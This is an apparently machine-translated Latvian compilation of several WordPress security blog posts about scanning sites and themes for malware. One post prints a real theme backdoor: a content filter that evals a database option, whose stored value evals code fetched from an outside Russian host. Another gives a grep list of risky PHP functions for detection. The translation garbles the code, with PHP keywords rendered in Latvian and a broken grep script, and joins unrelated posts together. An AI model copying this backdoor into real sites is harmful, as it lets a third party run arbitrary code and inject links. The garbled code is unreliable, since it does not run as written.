WordPress ir vispopulārākais dzinējs dažādu informācijas vietņu un emuāru veidošanai. Jūsu vietnes drošība ir vairāk nekā jūsu datu drošība. Tas ir daudz svarīgāk, jo tā ir arī visu to lietotāju drošība, kuri lasa un uzticas jūsu resursam. Tāpēc ir tik svarīgi, lai vietne nebūtu inficēta ar vīrusiem vai kādu citu ļaunprātīgu kodu.

Kā aizsargāt WordPress no uzlaušanas, mēs apskatīsim kādā no šiem rakstiem, taču tagad es vēlos jums pastāstīt, kā pārbaudīt, vai WordPress vietnē nav vīrusu un ļaunprātīga koda, lai pārliecinātos, ka viss ir droši.

Pati pirmā iespēja, kas nāk prātā, ir tāda, ka jūs esat uzlauzuši hakeri un jūsu vietnes kodā izveidojuši savas aizmugures durvis, lai varētu sūtīt surogātpastu, ievietot saites un citas sliktas lietas. Dažreiz tas notiek, taču tas ir diezgan rets gadījums, ja programmatūra tiek atjaunināta laikā.

Ir tūkstošiem bezmaksas WordPress motīvu un dažādu spraudņu, un tas jau var radīt draudus. Viena lieta, kad lejupielādējat veidni no WordPress vietnes, un pavisam cita lieta, ja to atrodat kreisajā vietnē. Negodīgi izstrādātāji savos produktos var iegult dažādus ļaunprātīgus kodus. Risks ir vēl lielāks, ja bez maksas lejupielādējat premium veidnes, kur hakeri, ne par ko neriskējot, var pievienot kaut kādu drošības caurumu, caur kuru viņi var iekļūt un darīt to, kas viņiem nepieciešams. Tāpēc ir tik svarīgi pārbaudīt, vai WordPress vietnē nav vīrusu.

Pārbauda, ​​vai WordPress vietnē nav vīrusu

Pirmā lieta, kas jums jāmeklē, pārbaudot vietni vīrusiem, ir WordPress spraudņi. Ātri un vienkārši varat skenēt savu vietni un atrast aizdomīgus koda apgabalus, kuriem ir vērts pievērst uzmanību neatkarīgi no tā, vai tie atrodas motīvā, spraudnī vai pašā Wodpress kodolā. Apskatīsim dažus no populārākajiem spraudņiem:

1.TOC

Šis ļoti vienkāršais spraudnis pārbauda visus jūsu vietnē instalētos motīvus, lai noskaidrotu, vai tajos nav ļaunprātīga koda. Spraudnis nosaka slēptās saites, kas šifrētas, izmantojot base64 koda ievietošanu, un arī parāda Detalizēta informācija par konstatētajām problēmām. Visbiežāk atrastie koda fragmenti nav vīrusi, taču tie var būt potenciāli bīstami, tāpēc tiem vajadzētu pievērst uzmanību.

Atvērt "Izskats" -> "TAC" tad pagaidiet, līdz visas tēmas ir pārbaudītas.

2. VIP skeneris

Ļoti līdzīgs TOC tēmu skenerim, taču parāda detalizētāku informāciju. Tās pašas saites noteikšanas iespējas slēptais kods un citi ļaunprātīgi ieliktņi. Vienkārši atveriet VIP skenera vienumu rīku sadaļā un analizējiet rezultātu.

Var būt pietiekami, lai noņemtu papildu faili piemēram, desktop.ini. Vai arī jums ir sīkāk jāaplūko, kas notiek failos, izmantojot base64.

3. Ļaunprogrammatūras apkarošana no GOTMLS.NET

Šis spraudnis ļauj ne tikai skenēt vietnes motīvus un kodolu pret vīrusiem, bet arī aizsargāt vietni no brutālā spēka parolēm un dažādiem XSS, SQLInj uzbrukumiem. Meklēšana tiek veikta, pamatojoties uz zināmiem parakstiem un ievainojamībām. Dažas ievainojamības var novērst uz vietas. Lai sāktu failu skenēšanu, atveriet "Anti-Malvare" sānu izvēlnē un noklikšķiniet uz "Palaist skenēšanu":

Lai varētu palaist skenēšanu, jums ir jāatjaunina parakstu datu bāzes.

4. Wordfence

Šis ir viens no populārākajiem WordPress drošības un ļaunprātīgas programmatūras skenēšanas spraudņiem. Izņemot skeneri, kurā var atrast lielāko daļu grāmatzīmju WordPress kods, pastāv pastāvīga aizsardzība no dažādi veidi uzbrukumi un parole brutāls spēks. Meklēšanas laikā spraudnis atrod iespējamās problēmas ar dažādiem spraudņiem un motīviem, ziņo par nepieciešamību atjaunināt WordPress.

Atveriet cilni "WPDefence" sānu izvēlnē un pēc tam dodieties uz cilni "Skenēt" un nospiediet "Sākt skenēšanu":

Skenēšana var ilgt noteikts laiks, bet pēc pabeigšanas jūs redzēsiet detalizētu ziņojumu par atrastajām problēmām.

5. Antivīruss

Šis ir vēl viens vienkāršs spraudnis, kas pārbaudīs jūsu vietnes veidni, lai atrastu ļaunprātīgu kodu. Trūkums ir tāds, ka tiek skenēta tikai pašreizējā veidne, bet informācija tiek parādīta pietiekami detalizēti. Jūs redzēsiet visas bīstamās funkcijas, kas ir motīvā, un pēc tam varēsiet detalizēti analizēt, vai tās nerada briesmas. Atrodiet preci "Antivīruss" iestatījumos un pēc tam noklikšķiniet uz "Skenējiet motīvu veidnes tūlīt":

6. Integritātes pārbaudītājs

Ir arī ieteicams pārbaudīt integritāti WordPress faili, ja vīruss jau ir kaut kur reģistrējies. Šim nolūkam varat izmantot integritātes pārbaudītāja spraudni. Tas pārbauda visus galvenos, spraudņu un veidņu failus, vai nav notikušas izmaiņas. Skenēšanas beigās jūs redzēsiet informāciju par mainītajiem failiem.

Tiešsaistes pakalpojumi

Ir arī vairāki tiešsaistes pakalpojumi, kas ļauj pārbaudīt, vai WordPress vietnē nav vīrusu, vai pārbaudīt tikai veidni. Šeit ir daži no tiem:

themecheck.org- jūs lejupielādējat motīvu arhīvu un redzat visus brīdinājumus par iespējamām ļaunprātīgām funkcijām, kas tajā tiek izmantotas. Jūs varat ne tikai apskatīt informāciju par savu tēmu, bet arī par citām tēmām, kuras augšupielādējuši citi lietotāji, kā arī dažādas versijas Tēmas. Neatkarīgi no atrastajiem spraudņiem var atrast šajā vietnē. Pārbaude WordPress tēmas ir arī ļoti svarīgi.

virustotal.com- labi zināms resurss, kurā varat pārbaudīt, vai savā vietnē vai veidnes failā nav vīrusu.

ReScan.pro- WordPress vietnes skenēšana pret vīrusiem, izmantojot šo pakalpojumu, tiek veikta statiskā un dinamiskā analīze, lai atklātu iespējamās novirzīšanas; Pārbauda vietni pret dažādiem melnajiem sarakstiem.

sitecheck.sucuri.net- vienkāršs pakalpojums vīrusu vietņu un tēmu skenēšanai. Ir WordPress spraudnis. Atklāj bīstamas saites un skriptus.

Manuāla pārbaude

Nekas nevar būt labāks par manuālu pārbaudi. Linux ir šī brīnišķīgā grep utilīta, kas ļauj meklēt patvaļīgu virkņu gadījumus mapē ar failiem. Atliek saprast, ko mēs meklēsim:

eval - šī funkcija ļauj izpildīt patvaļīgu php kods, to neizmanto sevi cienoši produkti, ja kāds no spraudņiem vai motīviem izmanto šo funkciju, ar gandrīz simts procentu varbūtību varam teikt, ka tur ir vīruss;

• base64_decode- šifrēšanas funkcijas var izmantot kopā ar eval, lai paslēptu kaitīgo kodu, taču tās var izmantot arī miermīlīgiem nolūkiem, tāpēc esiet uzmanīgi;
• sha1- cita ļaunprātīga koda šifrēšanas metode;
• gzinflate- saspiešanas funkcija, tie paši mērķi, kopā ar eval, piemēram, gzinflate(base64_decode(code);
• strrev- pagriež līniju atpakaļ ne agrāk, jo opciju var izmantot primitīvai šifrēšanai;
• drukāt- izvada informāciju pārlūkprogrammā, kopā ar gzinflate vai base64_decode tas ir bīstams;
• file_put_contents- Pats WordPress vai spraudņi joprojām var izveidot failus failu sistēmā, taču, ja motīvs to dara, jums vajadzētu būt uzmanīgiem un pārbaudīt, kāpēc tas tā dara, jo var tikt instalēti vīrusi;
• file_get_contents- vairumā gadījumu izmanto miermīlīgiem nolūkiem, taču to var izmantot, lai lejupielādētu ļaunprātīgu kodu vai nolasītu informāciju no failiem;
• čokurošanās- tas pats stāsts;
• fopen- atver failu rakstīšanai, nekad nevar zināt, kādam nolūkam;
• sistēma- funkcija izpilda komandu iekšā Linux sistēma, ja pats motīvs, spraudnis vai WordPress to dara, visticamāk, ir kāds vīruss;
• simbolsaite- izveido simboliskas saites sistēmā, iespējams, vīruss mēģina izveidot galveno failu sistēma pieejams no ārpuses;
• kopiju- kopē failu no vienas vietas uz citu;
• getcwd- atgriež pašreizējā darba direktorija nosaukumu;
• cwd- maina pašreizējo darba mapi;
• ini_get- saņem informāciju par PHP iestatījumiem, bieži vien mierīgiem nolūkiem, bet nekad nevar zināt;
• kļūdu_ziņošana(0)- atspējo jebkuru kļūdu ziņojumu izvadi;
• window.top.location.href - javascript funkcija, izmanto novirzīšanai uz citām lapām;
• uzlauzts- tātad katram gadījumam pārbaudām, pēkšņi pats hakeris nolēma mums pastāstīt.

Katru atsevišķu vārdu varat aizstāt ar šādu komandu:

grep -R "uzlauzts" /var/www/path/to/files/wordpress/wp-content/

Vai arī izmantojiet vienkāršu skriptu, kas meklēs visus vārdus vienlaikus:

value="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
kopēt (
eval(
sistēma (
simbolsaite (
kļūdu_ziņošana(0)
drukāt
file_get_contents(
file_put_contents(
fopen(
uzlauzts"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

Sveiki draugi. Vai esat pārliecināts, ka bezmaksas WordPress veidne, ko izmantojat savām vietnēm un emuāriem, ir patiesi droša un nesatur slēptus draudus vai ļaunprātīgu kodu? Vai esat par to pilnīgi pārliecināts? Absolūti?)

Jūs domājat, ka esat izpildījis veidni, noņēmis no tās slēptās saites, un darbs ir paveikts. Jūs periodiski skenējat vietnes failus, izmantojot pretvīrusu, ielūkojaties Yandex tīmekļa pārziņa rīkos cilnē Drošība un jūtaties atvieglots, redzot tur ziņojumu: " Vietnē netika atklāts neviens ļaunprātīgs kods«.

Tā es arī domāju. Es negribētu tevi apbēdināt, bet...

Slēpts bīstams kods bezmaksas WordPress veidnēs

Šī ir vēstule, kuru pagājušajā nedēļā saņēmu pa e-pastu no sava hostinga uzņēmuma. Nesen viņi ir ieviesuši regulāru visu vietnes failu pārbaudi, lai meklētu ļaunprātīgu saturu, un viņi atrada šo saturu pie manis.

Viss sākās, kad kādu pēcpusdienu apmeklēju savu vietni un nevarēju to palaist — tika parādīts aizskarošs ziņojums par to, ka netiek atrasti faili ar paplašinājumu php. Nedaudz saspringusi, devos izpētīt mapes saturu ar vietni hostingā un uzreiz atklāju problēmu - mans veidnes fails fuctions.php tika pārdēvēts par Functions.php.malware, kas, šķiet, neviennozīmīgi liecināja par antivīrusu. strādā šeit vai kaut kas tamlīdzīgs) Aizgājusi uz pastu, es atradu augstāk minēto ziņojumu no hostera.

Pirmā lieta, ko es izdarīju, protams, bija pārbaudīt šo failu, pētīja tā saturu, skenēja ar visādiem antivīrusiem, desmitiem tiešsaistes pakalpojumi vīrusu pārbaudei utt. — beigās nekas netika atrasts, visi vienbalsīgi apgalvoja, ka fails ir pilnīgi drošs. Protams, izteicu savas šaubas saimniekam, sakot, ka esi kaut ko saputrojis, taču katram gadījumam palūdzu sniegt ziņojumu par ļaunprātīga koda atklāšanu.

Un tā viņi man atbildēja

Iegāju google informāciju par šo kodu un nopietni domāju...

Kā veidnē atrast ļaunprātīga koda daļu

Kā izrādās, tas ir patiesi netriviāls paņēmiens, kas ļauj ieinteresētajām pusēm pārsūtīt datus uz jūsu vietni un mainīt lapu saturu bez jūsu ziņas! Ja izmantojat bezmaksas veidni, tad Es ļoti iesaku pārbaudīt jūsu functions.php tālāk norādīto kodu:

add_filter('saturs', '_emuāra informācija', 10001);
funkcija _bloginfo($content)(
globālā $post;
if(is_single() && ($co=@eval(get_option('emuāra opcija'))) !== false)(
atgriezt $ co;
) else return $content;
}

Pat ar manām ļoti zemajām PHP zināšanām ir skaidrs, ka tiek izveidots noteikts filtrs, kas piesaistīts globālajam mainīgajam ierakstam un saturam, kas ir atbildīgi par satura attēlošanu tikai emuāra ierakstu lapās (nosacījums is_single). Jau aizdomīgi, vai ne? Nu, tagad redzēsim, ko tas izdos. šo kodu mūsu mājas lapā.

Ļoti aizdomīgi izskatās arī datubāzē pieprasītā interesanta iespēja blogoption. Dosimies uz mūsu datu bāzi MySQL dati un atrodi tur tabulu ar nosaukumu wp_options, ja nemainīji prefiksus, tad pēc noklusējuma tā izskatīsies šādi. Un tajā mēs atrodam līniju, kas mūs interesē, ko sauc par blogoption

Kāda skaistule! Mēs redzam šādu iespēju

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Tie. No noteiktas vietnes (un krievu vietnes, ņemiet vērā) viņi atgriež saturu, kurā var būt jebkas! Jebkurš skaits saišu, ļaunprātīgu kodu, izmainītu tekstu utt. Piekļūstot pašai vietnei, tiek parādīta 403 piekļuves kļūda, kas nav pārsteidzoši. Protams, arī šo opciju izņēmu no datu bāzes.

Saskaņā ar upuru informāciju precīzs jūsu raksta saturs parasti tiek atgriezts tikai ar vienu modifikāciju — jebkura punkta “” vietā. tekstā tika paslēpta atvērta saite! Un starp citu, šo iespēju tiek ierakstīts datu bāzē, kad pati veidne ir instalēta, un pēc tam kods, kas to veiksmīgi veic, pašiznīcinās. Un es divus gadus dzīvoju ar tādiem atkritumiem, un neviens antivīruss vai pakalpojums man to neatklāja šie draudi uz visu to laiku. Godīgi sakot, es nepamanīju, vai šis triks man kādreiz darbojās, vai arī mans drošības spraudnis bloķēja šo funkciju (vai varbūt kāds no WordPress atjauninājumiem aizvēra šo caurumu), taču tas joprojām ir nepatīkami.

Morāle par bezmaksas sieru

Kā jums patīk mūsu veidņu “tulkotāju” (vai to personu, kas tās ievieto savos katalogos) izsmalcinātība? Tas nav jums, lai izgrieztu saites no kājenes) Žēl, ka es neatceros, no kurienes lejupielādēju savu veidni, tas bija sen, pretējā gadījumā es noteikti būtu uzrakstījis pāris sirsnīgus. Un, ja man toreiz būtu tāda pati pieredze, kāda man ir tagad, es noteikti neizmantotu bezmaksas veidne, vai kā pēdējo līdzekli, es nelejupielādētu no nezināmiem avotiem!

Vienkāršāk ir nopirkt kādu oficiālu premium veidni par 15-20 dolāriem un dzīvot mierā, zinot, ka tajā nav caurumu vai šifrētu saišu, un pat ja ir ievainojamības, izstrādātāji noteikti izlaidīs atjauninājumu, kurā šīs bedres būs slēgts. ( Starp citu, Artems nesen publicēja rakstu, kurā viņš runā par premium veidnēm un pat izsniedz reklāmas kodus brutālām atlaidēm interesentiem)

Sveiki IdeaFox draugi!

Es nezinu, kā jums, bet man ir grūti gulēt naktī. Mani moka emuāra drošības problēmas. Man vairs nav spēka :-)

Es izlasīju virkni emuāru par šo tēmu un pārbaudīju daudzus spraudņus, kas palīdz atrisināt šo problēmu. Un komentāros viņi sāka uzdot jautājumus par vietnes aizsardzības tēmu, kas lika man uzrakstīt šo piezīmi.

Iedomājieties, ka jūs veidojat emuāru, rakstāt rakstus, cenšaties... Un nāk ļaunie dupši un sabojā jūsu vietni. Es domāju, ka būs daudz bēdu.

Galu galā katrs parasts emuāru autors iegulda daudz laika un pūļu savas vietnes izstrādē. Un daudziem vispār blogošana kļūst par apsēstību... Šeit un līdz brīdim, ja TAS notiek :-)

Nu, jūs saprotat, cik tas ir svarīgi.

Beidzot ķersimies pie lietas :)

Pirms pāris mēnešiem jau rakstīju piezīmi par uzlaušanu. Noteikti izlasiet to. Bet kopš tā laika ir pagājis diezgan daudz laika un es veicu papildu pasākumus, lai stiprinātu visaptverošu aizsardzību.

Turpmākajās piezīmēs es noteikti pakavēšos pie šī jautājuma sīkāk. (Es arī atceros un rakstu par ISP iestatījumiem)

3. Pārbaudiet vietni citos tiešsaistes pakalpojumos

Šādu pakalpojumu netrūkst. Man ir stingrs viedoklis, ka daudzi no tiem ir pilnīgi stulbi un radīti tikai un vienīgi reklāmas rādīšanai.

Doctor Web

DR.Web kompānija izgatavota labs serviss lai pārbaudītu vietnes tiešsaistē. Personīgi viņš reiz man palīdzēja atrast infekciju drauga emuārā (.htaccess failā bija trešās puses kods)

Pārbaude ir ļoti vienkārša. Ievadiet savu URL un gaidiet verifikācijas rezultātu.

antivirus-alarm.ru

Jaudīgs vietņu skeneris, kas izmanto pat 43 pretvīrusu datu bāzes no pasaules vadošajiem antivīrusu uzņēmumiem.

Arī šeit viss ir ļoti vienkārši. Mēs ievadām savas vietnes URL un ar aizturētu elpu gaidām skenēšanas rezultātus.

Es gaidīju šos.

Viss tīrs, var mierīgi gulēt :-)

Tas viss, protams, ir labi, taču jums ir jāinstalē arī daži spraudņi, kas WordPress emuāriem nemaz nekaitēs.

4. Palūdziet savam saimniekam pārbaudīt jūsu vietni

Fakts ir tāds, ka mitinātāji ir vēl vairāk noraizējušies par drošības problēmām nekā jūs, un viņiem ir spēcīgi drošības pasākumi. Turklāt ar specializētiem aizsardzības līdzekļiem.

Šīs ir ziņas, kuras es jums šodien sniedzu. Tālāk es jums pastāstīšu par ļoti jaudīgu spraudni, kas var ievērojami aizsargāt jūsu WordPress emuāru no uzlaušanas.

Es jau strādāju ar viņu 2 mēnešus un esmu ļoti apmierināts ar viņu. Kamēr izdomāju, 3 reizes nobanojos: –) Vārdu sakot, ir ko stāstīt.

Viens no svarīgākajiem soļiem, veidojot emuāru, ir augstas kvalitātes veidnes izvēle. Ir daudz vietņu, gan maksas, gan bezmaksas. Tomēr šeit jābūt uzmanīgiem, jo ​​pastāv liela iespējamība, ka kopā ar failu saņemsiet vīrusus, ļaunprātīgi skripti un slēptās saites.

Bet pat ja veidne ir tīra drošības ziņā un jūs esat pilnībā apmierināts ar tās dizainu, lietojamību un funkcionalitāti, tas nenozīmē, ka viss ir kārtībā. Motīvam ir jābūt derīgam HTML un CSS kodam un jāatbilst visiem standartiem CMS WordPress. Pat maksas tēmām un pēc pasūtījuma izgatavotām veidnēm ir problēmas ar pēdējo.

Dzinēju izstrādātāji to nepārtraukti attīsta, un veidņu autori ne vienmēr seko līdzi, veidojot tos, izmantojot novecojušas funkcijas.

Šodien es jums parādīšu 2 veidus, kā pārbaudīt WordPress motīvu atbilstību standartiem. Šie rīki tiek izmantoti, kad tie tiek pievienoti oficiālajam direktorijam https://wordpress.org/themes/

Pakalpojums WordPress motīvu un Joomla veidņu atbilstības standartiem pārbaudei

ThemeCheck.org ir bezmaksas pakalpojums, kas ļauj pārbaudīt CMS WordPress un Joomla veidņu drošību un kvalitāti pirms to instalēšanas vietnē.

Lai pārbaudītu motīvu, lejupielādējiet tā arhīvu no sava datora, vietnē themecheck.org noklikšķinot uz pogas “Atlasīt failu”. Ja nevēlaties, lai skenēšanas rezultāti tiktu saglabāti pakalpojumā un būtu pieejami citiem lietotājiem, pārbaudiet “ Pēc rezultātiem aizmirstiet augšupielādētos datus“. Tagad noklikšķiniet uz pogas “Iesniegt”.

Piemēram, es paņēmu tēmu Interfeiss, kuru es lejupielādēju no oficiālās vietnes. 99 no 100 – 0 kritiskas kļūdas un 1 brīdinājums. Tas ir ļoti labs rezultāts.

Salīdzinājumam, mana emuāra veidne saņēma 0 punktu (14 kļūdas un 23 brīdinājumi). Domāju, ka daudziem rezultāti īpaši neatšķirsies, it īpaši, ja tēmas jau ir novecojušas. Visas piezīmes ar paskaidrojumiem, norādot failus un rindas, kur tie tika atrasti, atrodas tajā pašā lapā zemāk.

Atklāti sakot, es tur neko daudz nesapratu, tas būtu noderīgāks autoriem, un man ir vieglāk mainīt veidni, nekā visu labot. Es tikai nezinu, kad es izlemšu to darīt.

Vietnē Home ir liels iepriekš pārbaudītu WordPress un Joomla tīmekļa tēmu klāsts ar iespēju kārtot pēc pievienošanas laika vai vērtējuma. Noklikšķinot uz tiem, jūs varat redzēt detalizētu informāciju un saites uz autora vietni un lejupielādes lapu.

Ja esat izstrādātājs un jūsu tēma ir 100% derīga, varat par to informēt lietotājus, uzstādot īpašu emblēmu ar vērtējumu.

ThemeCheck.org pakalpojuma vērtība ir tāda, ka jebkurš tīmekļa pārzinis var to izmantot, lai izvēlētos augstas kvalitātes motīvu pirms tā instalēšanas emuārā.

Motīvu pārbaudes spraudnis

Pārbaudiet jau izveidota veidne Saderību ar jaunākajiem WordPress standartiem var panākt, izmantojot spraudni Theme Check. Lejupielādes saite jaunākā versija: https://wordpress.org/plugins/theme-check/

Spraudņa funkcionalitāte ir līdzīga iepriekš aprakstītajam pakalpojumam. Pēc tam nav iestatījumu standarta instalācija un nav nepieciešams veikt aktivizāciju. Pārbaudes procedūra:

1. Pārejiet uz administratora paneli uz izvēlnes lapu "Izskats" - "Tēmas pārbaude".
2. Ja jums ir instalēti vairāki motīvi, nolaižamajā sarakstā atlasiet vajadzīgo motīvu.
3. Ja nevēlaties sūtīt informāciju, atzīmējiet izvēles rūtiņu “Suppress INFO”.
4. Noklikšķiniet uz pogas "Pārbaudīt".

Rezultāti tiks parādīti tajā pašā lapā.

Kā jūs redzat, standarta tēma Divdesmit desmit Tas arī nav ideāli, bet, piemēram, Divdesmit četrpadsmit nav kļūdu.

Pēc pārbaudes spraudni var atspējot vai, vēl labāk, pilnībā noņemt līdz nākamajai reizei.

Secinājums. Pirms jaunas instalēšanas WordPress veidne pārbaudiet ne tikai slēptās saites un ļaunprātīgu kodu, izmantojot spraudni TAC, bet arī pakalpojumu ThemeCheck.org vai spraudni Theme Check, lai nodrošinātu atbilstību jaunākajiem CMS standartiem.

P.S. Nesen, pārlūkojot TopSape Reader, ieraudzīju jaunu SEO blogu zenpr.ru, kas pēc klikšķu skaita mēnesī ieņem 1. vietu starp blogeriem. Ņemot vērā, ka viņam ir tikai nedaudz vairāk par mēnesi, rezultāts ir cieņas vērts. Dizains ir minimālisma stilā, ja neteiktu, ka tāda nemaz nav, bet autors raksta - izlasīsiet. Viss līdz galam un bez ūdens. Tāpat kā emuāra nosaukumā – “nulle papildu rakstzīmes”. Iesaku izlasīt, atradīsi daudz noderīgas informācijas.